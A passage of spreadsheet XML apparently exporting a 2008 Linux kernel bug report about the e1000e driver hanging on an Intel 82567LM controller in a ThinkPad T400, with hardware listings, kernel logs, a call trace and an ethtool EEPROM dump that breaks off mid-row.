-a Linux sfstudio.sadnet.lo 2.6.28 #2 SMP PREEMPT Thu Dec 25 17:14:54 OMST 2008 i686 Intel(R) Celeron(R) CPU 540 @ 1.86GHz GNU/Linux</t>
  </si>
  <si>
    <t>e1000e 82567LM Tx Unit Hang</t>
  </si>
  <si>
    <t>2008-12-26 02:50 UTC</t>
  </si>
  <si>
    <t>Wang, Baojun</t>
  </si>
  <si>
    <t>2011-05-04 03:48 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27-git2 Earliest failing kernel version: unknown Distribution: gentoo amd64 (~amd64), 2008.0 Hardware Environment: Thinkpad T400 with GM45 (ICH9) $ lspci 00:00.0 Host bridge: Intel Corporation Mobile 4 Series Chipset Memory Controller Hub (rev 07) 00:01.0 PCI bridge: Intel Corporation Mobile 4 Series Chipset PCI Express Graphics Port (rev 07) 00:03.0 Communication controller: Intel Corporation Mobile 4 Series Chipset MEI Controller (rev 07) 00:03.2 IDE interface: Intel Corporation Mobile 4 Series Chipset PT IDER Controller (rev 07) 00:03.3 Serial controller: Intel Corporation Mobile 4 Series Chipset AMT SOL Redirection (rev 07) 00:19.0 Ethernet controller: Intel Corporation 82567LM Gigabit Network Connection (rev 03) 00:1a.0 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #4 (rev 03) 00:1a.1 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #5 (rev 03) 00:1a.2 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #6 (rev 03) 00:1a.7 USB Controller: Intel Corporation 82801I (ICH9 Family) USB2 EHCI Controller #2 (rev 03) 00:1b.0 Audio device: Intel Corporation 82801I (ICH9 Family) HD Audio Controller (rev 03) 00:1c.0 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 1 (rev 03) 00:1c.1 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 2 (rev 03) 00:1c.3 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 4 (rev 03) 00:1c.4 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 5 (rev 03) 00:1d.0 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #1 (rev 03) 00:1d.1 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #2 (rev 03) 00:1d.2 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #3 (rev 03) 00:1d.7 USB Controller: Intel Corporation 82801I (ICH9 Family) USB2 EHCI Controller #1 (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 93) 00:1f.0 ISA bridge: Intel Corporation ICH9M-E LPC Interface Controller (rev 03) 00:1f.2 SATA controller: Intel Corporation ICH9M/M-E SATA AHCI Controller (rev 03) 00:1f.3 SMBus: Intel Corporation 82801I (ICH9 Family) SMBus Controller (rev 03) 01:00.0 VGA compatible controller: ATI Technologies Inc Mobility Radeon HD 3400 Series 03:00.0 Network controller: Intel Corporation PRO/Wireless 5100 AGN [Shiloh] Network Connection 15:00.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev ba) 15:00.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C832 IEEE 1394 Controller (rev 04) 15:00.2 SD Host controller: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host Adapter (rev 21) 15:00.3 System peripheral: Ricoh Co Ltd R5C843 MMC Host Controller (rev 11) 15:00.4 System peripheral: Ricoh Co Ltd R5C592 Memory Stick Bus Host Adapter (rev 11) 15:00.5 System peripheral: Ricoh Co Ltd xD-Picture Card Controller (rev 11) $ cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 23 model name : Intel(R) Core(TM)2 Duo CPU P8400 @ 2.26GHz stepping : 6 cpu MHz : 800.000 cache size : 3072 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 lahf_lm tpr_shadow vnmi flexpriority bogomips : 4521.95 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 23 model name : Intel(R) Core(TM)2 Duo CPU P8400 @ 2.26GHz stepping : 6 cpu MHz : 800.000 cache size : 3072 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 lahf_lm tpr_shadow vnmi flexpriority bogomips : 4521.77 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: $ cat /proc/interrupts CPU0 CPU1 0: 12183 15128 IO-APIC-edge timer 1: 4 4 IO-APIC-edge i8042 8: 1 0 IO-APIC-edge rtc0 9: 376 380 IO-APIC-fasteoi acpi 12: 1175 1157 IO-APIC-edge i8042 16: 12 13 IO-APIC-fasteoi yenta, uhci_hcd:usb6 17: 73 74 IO-APIC-fasteoi uhci_hcd:usb7, HDA Intel, firewire_ohci 18: 0 0 IO-APIC-fasteoi uhci_hcd:usb8 19: 1 1 IO-APIC-fasteoi ehci_hcd:usb2 20: 0 0 IO-APIC-fasteoi uhci_hcd:usb3 21: 5429 2515 IO-APIC-fasteoi uhci_hcd:usb4 22: 0 0 IO-APIC-fasteoi uhci_hcd:usb5 23: 14 17 IO-APIC-fasteoi ehci_hcd:usb1 2294: 1817 1695 PCI-MSI-edge ahci 2295: 127 91 PCI-MSI-edge eth0 2296: 0 0 PCI-MSI-edge pciehp 2297: 0 0 PCI-MSI-edge pciehp 2298: 0 0 PCI-MSI-edge pciehp 2299: 0 0 PCI-MSI-edge pciehp 2300: 0 0 PCI-MSI-edge pciehp 2301: 0 0 DMAR_MSI-edge dmar2 2302: 0 0 DMAR_MSI-edge dmar1 2303: 0 0 DMAR_MSI-edge dmar0 NMI: 0 0 Non-maskable interrupts LOC: 10314 12633 Local timer interrupts RES: 7338 6999 Rescheduling interrupts CAL: 39 29 Function call interrupts TLB: 5 6 TLB shootdowns SPU: 0 0 Spurious interrupts ERR: 0 MIS: 0 Software Environment: gentoo 2008.0(~amd64) + gnome 2.24 (networkmanager), gcc 4.3.2, glibc 2.9(20081201) Problem Description: the e1000e driver for 82567LM(rev 03) omit Tx Unit Hang after some amount of time (and some network traffics) and then can not recover from that error. There is no problem if passing kernel param acpi=off (pci=noacpi seems also fine but ..). (thinkpad-acpi seems have problems with T400, so I'm not sure the e1000e Tx Unit Hang problem is only with Thinkpad laptops or not) e1000e 0000:00:19.0: irq 2295 for MSI/MSI-X e1000e 0000:00:19.0: irq 2295 for MSI/MSI-X ADDRCONF(NETDEV_UP): eth0: link is not ready 0000:00:19.0: eth0: Link is Up 100 Mbps Full Duplex, Flow Control: None 0000:00:19.0: eth0: 10/100 speed: disabling TSO ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready eth0: no IPv6 routers present DMAR:[DMA Read] Request device [00:19.0] fault addr fff03000 DMAR:[fault reason 06] PTE Read access is not set 0000:00:19.0: eth0: Detected Tx Unit Hang: TDH &lt;a3&gt; TDT &lt;b2&gt; next_to_use &lt;b2&gt; next_to_clean &lt;a3&gt; buffer_info[next_to_clean]: time_stamp &lt;fffe286d&gt; next_to_watch &lt;a3&gt; jiffies &lt;fffe31e5&gt; next_to_watch.status &lt;0&gt; 0000:00:19.0: eth0: Detected Tx Unit Hang: TDH &lt;a3&gt; TDT &lt;b2&gt; next_to_use &lt;b2&gt; next_to_clean &lt;a3&gt; buffer_info[next_to_clean]: time_stamp &lt;fffe286d&gt; next_to_watch &lt;a3&gt; jiffies &lt;fffe39b5&gt; next_to_watch.status &lt;0&gt; 0000:00:19.0: eth0: Detected Tx Unit Hang: TDH &lt;a3&gt; TDT &lt;b2&gt; next_to_use &lt;b2&gt; next_to_clean &lt;a3&gt; buffer_info[next_to_clean]: time_stamp &lt;fffe286d&gt; next_to_watch &lt;a3&gt; jiffies &lt;fffe418a&gt; next_to_watch.status &lt;0&gt; ------------[ cut here ]------------ WARNING: at net/sched/sch_generic.c:226 dev_watchdog+0xf7/0x154() NETDEV WATCHDOG: eth0 (e1000e): transmit timed out Modules linked in: snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss uvcvideo compat_ioctl32 firewire_ohci videodev firewire_core v4l1_compat scsi_wait_scan Pid: 3956, comm: metacity Not tainted 2.6.28-gentoo #1 Call Trace: &lt;IRQ&gt; [&lt;ffffffff802361ae&gt;] warn_slowpath+0xb4/0xda [&lt;ffffffff80490c73&gt;] usb_hcd_submit_urb+0x733/0x7fd [&lt;ffffffff804b11f0&gt;] input_pass_event+0x5a/0x7b [&lt;ffffffff804b2f5d&gt;] input_event+0x5c/0x7f [&lt;ffffffff804d7938&gt;] hidinput_report_event+0x25/0x37 [&lt;ffffffff804d4f95&gt;] hid_input_report+0x1da/0x1f0 [&lt;ffffffff80454531&gt;] scsi_run_queue+0x2f8/0x395 [&lt;ffffffff80380bfb&gt;] __next_cpu+0x19/0x26 [&lt;ffffffff80513aab&gt;] netif_tx_lock+0x3d/0x68 [&lt;ffffffff80513c1c&gt;] dev_watchdog+0xf7/0x154 [&lt;ffffffff8022a227&gt;] sched_slice+0x3b/0x47 [&lt;ffffffff8022a51a&gt;] task_tick_fair+0x49/0x78 [&lt;ffffffff80513b25&gt;] dev_watchdog+0x0/0x154 [&lt;ffffffff8023e6d8&gt;] run_timer_softirq+0x151/0x1bf [&lt;ffffffff8023aeec&gt;] __do_softirq+0x7c/0x135 [&lt;ffffffff8020d12c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff8020e5f4&gt;] do_softirq+0x2c/0x68 [&lt;ffffffff8023ac98&gt;] irq_exit+0x3f/0x91 [&lt;ffffffff8021b3f1&gt;] smp_apic_timer_interrupt+0x92/0xab [&lt;ffffffff8020cc0b&gt;] apic_timer_interrupt+0x6b/0x70 &lt;EOI&gt; &lt;4&gt;---[ end trace 15d0e5980221c96c ]--- 0000:00:19.0: eth0: Link is Up 100 Mbps Full Duplex, Flow Control: None 0000:00:19.0: eth0: 10/100 speed: disabling TSO ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready 0000:00:19.0: eth0: Detected Tx Unit Hang: TDH &lt;0&gt; TDT &lt;3&gt; next_to_use &lt;3&gt; next_to_clean &lt;0&gt; buffer_info[next_to_clean]: time_stamp &lt;fffe4c85&gt; next_to_watch &lt;0&gt; jiffies &lt;fffe550d&gt; next_to_watch.status &lt;0&gt; 0000:00:19.0: eth0: Detected Tx Unit Hang: TDH &lt;0&gt; Steps to reproduce: 1) get a computer with Intel Corporation 82567LM Gigabit Ethernet controller 2) compile kernel 2.6.28 (amd64) with e1000e 3) try to do some network traffic p.s: $ sudo ethtool -i eth0 driver: e1000e version: 0.3.3.3-k6 firmware-version: 1.8-3 bus-info: 0000:00:19.0 $ sudo ethtool -e eth0 Offset Values ------ ------ 0x0000 00 1c 25 96 bb ac 00 08 ff ff 83 10 ff ff ff ff 0x0010 08 10 ff ff c3 10 ee 20 aa 17 f5 10 86 80 00 00 0x0020 01 0d 00 00 00 00 05 86 20 30 00 0a 00 00 8b 8d 0x0030 02 06 40 2b 43 00 00 00 f5 10 ad ba f5 10 bf 10 0x0040 ad ba cb 10 ad ba ad ba 00 00 00 00 00 00 00 00 0x0050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0060 00 01 00 40 18 13 07 40 ff ff ff ff ff ff ff ff 0x0070 ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0b 0a 0x0080 20 60 1f 00 02 00 13 00 00 80 1d 00 ff 00 16 00 0x0090 dd cc 18 00 11 20 17 00 dd dd 18 00 12 20 17 00 0x00a0 00 80 1d 00 00 00 1f 00 ff ff ff ff ff ff ff ff 0x00b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x00c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x00d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x00e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x00f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0100 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0110 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0120 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0130 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0140 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0150 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0160 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0170 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0180 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0190 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x01a0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x01b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x01c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x01d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x01e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x01f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0200 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0210 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0220 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0230 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0240 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0250 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0260 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0270 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0280 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0290 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x02a0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x02b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x02c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x02d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x02e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x02f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0300 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0310 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0320 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0330 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0340 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0350 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0360 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0370 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0380 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0390 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x03a0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x03b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x03c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x03d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x03e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x03f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0400 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0410 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0420 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0430 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0440 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0450 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0460 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0470 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0480 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0490 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x04a0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x04b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x04c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x04d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x04e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x04f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0500 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0510 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0520 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0530 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0540 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0550 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0560 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0570 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0580 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0590 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x05a0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x05b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x05c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x05d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x05e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x05f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0600 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0610 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0620 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0630 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0640 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0650 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0660 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0670 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0680 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0690 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x06a0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x06b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x06c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x06d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x06e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x06f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0700 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0710 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0720 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0730 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0740 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0750 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0760 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0770 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0780 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0790 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x07a0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x07b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x07c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x07d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x07e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x07f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0800 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0810 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0820 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0830 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0840 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0850 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0860 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0870 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0880 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0890 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x08a0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x08b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x08c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x08d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x08e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x08f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0900 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0910 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0920 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0930 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0940 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0950 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0960 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0970 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0980 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0990 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x09a0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x09b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x09c0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x09d0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x09e0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x09f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0a00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0a10 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0a20 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0a30 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0a40 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0a50 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0a60 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0a70 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0a80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0a90 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0aa0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ab0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ac0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ad0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ae0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0af0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0b00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0b10 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0b20 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0b30 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0b40 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0b50 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0b60 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0b70 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0b80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0b90 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ba0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0bb0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0bc0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0bd0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0be0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0bf0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0c00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0c10 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0c20 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0c30 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0c40 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0c50 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0c60 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0c70 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0c80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0c90 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ca0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0cb0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0cc0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0cd0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ce0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0cf0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0d00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0d10 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0d20 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0d30 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0d40 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0d50 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0d60 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0d70 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0d80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0d90 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0da0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0db0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0dc0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0dd0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0de0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0df0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0e00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0e10 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0e20 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0e30 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0e40 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0e50 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0e60 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0e70 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0e80 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0e90 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ea0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0eb0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0x0ec0 ff ff 